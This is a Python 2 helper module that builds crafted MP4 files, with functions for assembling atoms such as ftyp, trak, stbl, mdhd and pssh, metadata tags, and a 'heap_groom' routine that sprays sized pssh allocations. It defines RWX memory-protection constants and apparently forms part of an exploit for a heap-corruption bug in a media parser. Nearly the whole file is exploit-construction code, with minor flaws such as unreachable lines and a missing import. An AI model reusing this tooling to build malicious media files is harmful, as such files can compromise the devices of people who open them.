#!/usr/bin/python2
# -*- coding: utf-8 -*-

import struct

DEBUG = False

PAGE_SIZE = 0x1000

PROT_READ = 0x01
PROT_WRITE = 0x02
PROT_EXEC = 0x04
PROT_RWX = PROT_READ | PROT_WRITE | PROT_EXEC

STBL_HEADER_SIZE = 0x08
PSSH_HEADER_SIZE = 0x20

if DEBUG:
    PSSH_TAG = 'spry'
else:
    PSSH_TAG = '\x00\x00\x00\x00'

def pb16(val):
    return struct.pack('>H', val)
    
def pb32(val):
    return struct.pack('>I', val)

def pb64(val):
    return struct.pack('>Q', val)

def p32(val):
    return struct.pack('<I', val)

def p64(val):
    return struct.pack('<Q', val)

def zero_pad(size):
    return '\x00' * size

pad_index = 0
def pad(size, base_val = None):
    global pad_index

    if size % 4 != 0:
        raise Exception('Padding must be aligned to 4')
        size += 4 - (size % 4)
        print >> sys.stderr, 'Warning: padding must be aligned to 4, padding %u...' % size
        
    if base_val is None:
        base_val = pad_index
        pad_index += size // 4

    if not DEBUG:
        return '\x00' * size

    padding = ''
    index = 0
    while len(padding) < size:
        padding += p32(base_val + index)
        index += 1
        
    return padding

def chunk(tag, data = '', length = None):
    if length is None:
        length = len(data) + 8

    if length > 0xffffffff:
        return pb32(1) + tag + pb64(length) + data

    return pb32(length) + tag + data

pssh_index = -1
def alloc_pssh(size):
    global pssh_index

    if size % 4 != 0:
        size += 4 - (size % 4)

    pssh_index += 1
    pssh = PSSH_TAG
    pssh += pad(16)
    pssh += pb32(size)
    pssh += pad(size, pad_index + 0x55aa0000)
    return chunk('pssh', pssh)

def alloc_pssh_data(data):
    pssh = PSSH_TAG
    pssh += pad(16)
    pssh += pb32(len(data))
    pssh += data
    return chunk('pssh', pssh)

def alloc_stbl(data = ''):
    return chunk('stbl', data)

def valid_stbl():
    stts = chunk('stts', zero_pad(8))
    stsz = chunk('stsz', zero_pad(12))
    stsc = chunk('stsc', zero_pad(12))
    stco = chunk('stco', zero_pad(12))
    
    # Valid 'stbl' must contain 'stts', 'stsz', 'stsc' and 'stco' chunks
    stbl = alloc_stbl(stts + stsz + stsc + stco)
    return stbl

def valid_trak(data_before_stbl = '', data_after_stbl = ''):
    # Valid 'trak' must contain a valid 'stbl'
    stbl = valid_stbl()
    trak = chunk('trak', data_before_stbl + stbl + data_after_stbl)
    return trak

def valid_ftyp():
    ftyp = chunk('ftyp', 'mp42' + p32(0x00000000) + 'isom')
    return ftyp

def valid_moov():
    moov = chunk('moov')
    return moov

def valid_mdhd(duration = 1, timescale = 1000, lang = 0):
    mdhd_version = pb32(0)
    mdhd_pad = pad(8)
    mdhd_timescale = pb32(timescale)
    mdhd_duration = pb32(duration)
    mdhd_lang = pb16(lang)

    mdhd = mdhd_version + mdhd_pad + mdhd_timescale + mdhd_duration + mdhd_lang
    mdhd = chunk('mdhd', mdhd)

    return mdhd

def alloc_dummy(data = ''):
    return chunk('----', data)

def alloc_titl(size = 8):
    return chunk('titl', 't' * 5 + 'titl' * (size // 4 ))
    
def alloc_perf(size = 8):
    return chunk('perf', 'p' * 5 + 'perf' * (size // 4))
    
def alloc_auth(size = 8):
    return chunk('auth', 'a' * 5 + 'auth' * (size // 4))

def alloc_gnre(size = 8):
    return chunk('gnre', 'g' * 5 + 'gnre' * (size // 4))

def alloc_metadata_header(size):
    return p32(9) + p32(size) + p32(0) + p32(0)
    
def alloc_metadata(key, type, size, data):
    if len(key) != 4 or len(type) != 4:
        raise Exception('Expecting key and type of size 4')

    return key[::-1] + type[::-1] + p32(size) + p32(data)

def alloc_placeholder(size):
    return alloc_titl(size)

def heap_groom(size, groom_count):
    return alloc_pssh(size) * groom_count

"""
def log2(num):
    if num <= 0:
        return None

    if num > 0x40000:
        raise None

    base = -1
    while num > 0:
        base += 1
        num //= 2

    return base

def get_alloc_size(size):
    if size <= 8:
        return 8
    base = log2(size - 1)
    if base is None:
        raise Exception('Invalid allocation size: %d (0x%08x)' % (size, size))
    alloc_size = 2 ** base
    if size > alloc_size:
        alloc_size *= 2
    return alloc_size
"""